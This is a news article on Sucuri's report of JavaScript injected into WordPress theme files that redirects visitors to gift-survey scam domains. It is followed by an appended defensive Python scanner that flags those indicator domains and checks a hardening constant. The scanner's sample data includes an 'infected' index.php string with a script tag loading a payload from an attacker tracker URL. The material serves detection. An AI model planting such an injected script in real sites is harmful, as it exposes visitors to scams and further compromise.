WordPress security flaw forces redirect to malicious websites

WordPress is experiencing yet another incident this month because of a security flaw. According to a report from researchers at Sucuri, malicious JavaScript is being injected into compromised WordPress sites. The JavaScript is injected into the theme's index.php file and forces a redirect to a malicious website. The website is part of what Sucuri calls a “survey-for-gifts scam” and uses the following domains: gotosecond2[.]com, adsformarket[.]com, admarketlocation[.]com, and admarketresearch[.]xyz. While those domains perform the redirect, Sucuri states that “statistic[.]admarketlocation[.]com/clockwork?&se_referrer= or track[.]admarketresearch[.]xyz/?track&se_referrer=” is loaded during the redirection process and ultimately delivers the malicious payload to the WordPress page.

This issue is affecting at least 2,000 WordPress websites, and that number is climbing quickly. Once a page is infected, researchers have found that further activity follows the initial infection, driven largely by the JavaScript payload injected during the final stage of the redirection. Threat actors are then able to inject additional malicious code into WordPress theme files, such as PHP backdoors and hack tools, to ensure they retain unrestricted access to the website.

To prevent this from occurring, Sucuri researchers recommend that website owners “disable the modification of primary folders [to] block hackers from inserting malicious files or includes as part of WordPress security hardening and security best practices.” Looking for the root cause of the infections, Sucuri also found exploitation of “multiple plugin vulnerabilities, including vulnerable versions of Simple Fields and CP Contact Form with PayPal.”
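As an added example that is not part of the Sucuri report or this article, the following Python triage helper flags theme files whose script tags reference the redirect domains or tracker paths listed above, and checks whether wp-config.php sets DISALLOW_FILE_MODS, the WordPress constant that implements the “disable modification” advice. The sample file contents are constructed for the demonstration.

```python
import re
from pathlib import Path

# Redirect and tracker domains from the report, with the [.] defanging removed.
IOC_DOMAINS = ("gotosecond2.com", "adsformarket.com",
               "admarketlocation.com", "admarketresearch.xyz")
# Path fragments of the tracker URLs loaded during the redirect chain.
IOC_PATHS = ("/clockwork?", "se_referrer=")

SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)

def scan_theme_source(source: str) -> list:
    """Return (reason, snippet) findings for one theme file's text.

    Only plain-text references are matched; an obfuscated loader that builds
    the URL at runtime needs a separate check or a diff against a clean copy."""
    findings = []
    for match in SCRIPT_TAG.finditer(source):
        tag = match.group(0)
        lowered = tag.lower()
        if any(domain in lowered for domain in IOC_DOMAINS):
            findings.append(("ioc-domain", tag[:80]))
        elif any(path in lowered for path in IOC_PATHS):
            findings.append(("ioc-tracker-path", tag[:80]))
    return findings

def scan_theme_dir(theme_dir) -> dict:
    """Scan every .php file under a theme directory, keyed by relative path."""
    root = Path(theme_dir)
    results = {}
    for php_file in root.rglob("*.php"):
        hits = scan_theme_source(php_file.read_text(errors="replace"))
        if hits:
            results[str(php_file.relative_to(root))] = hits
    return results

def file_mods_disabled(wp_config_source: str) -> bool:
    """True if wp-config.php sets DISALLOW_FILE_MODS to true, which blocks
    plugin/theme installs, updates and the built-in file editor."""
    pattern = r"define\(\s*['\"]DISALLOW_FILE_MODS['\"]\s*,\s*true\s*\)"
    return re.search(pattern, wp_config_source, re.I) is not None

# Constructed samples (not from the report): an injected index.php, a clean
# one, and a wp-config.php line applying the hardening constant.
INFECTED_INDEX = ('<script src="https://statistic.admarketlocation.com/'
                  'clockwork?&se_referrer="></script>\n<?php get_header(); ?>\n')
CLEAN_INDEX = '<?php get_header(); ?>\n<script src="/wp-includes/js/jquery.js"></script>\n'
HARDENED_CONFIG = "define('DISALLOW_FILE_MODS', true);\n"
```

Run `scan_theme_dir("/path/to/wp-content/themes/your-theme")` against a live theme directory to list the files that need review.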

Sucuri researchers warn that they “expect the attackers will continue to register new domains — or leverage existing unused domains — as more security vendors blacklist domains being used in this infection.” Given this, WordPress admins must take preemptive action to stop their websites from joining the rapidly growing list of infected sites. Until WordPress takes action and patches the associated security flaw, admins are on their own.

Featured image: Shutterstock
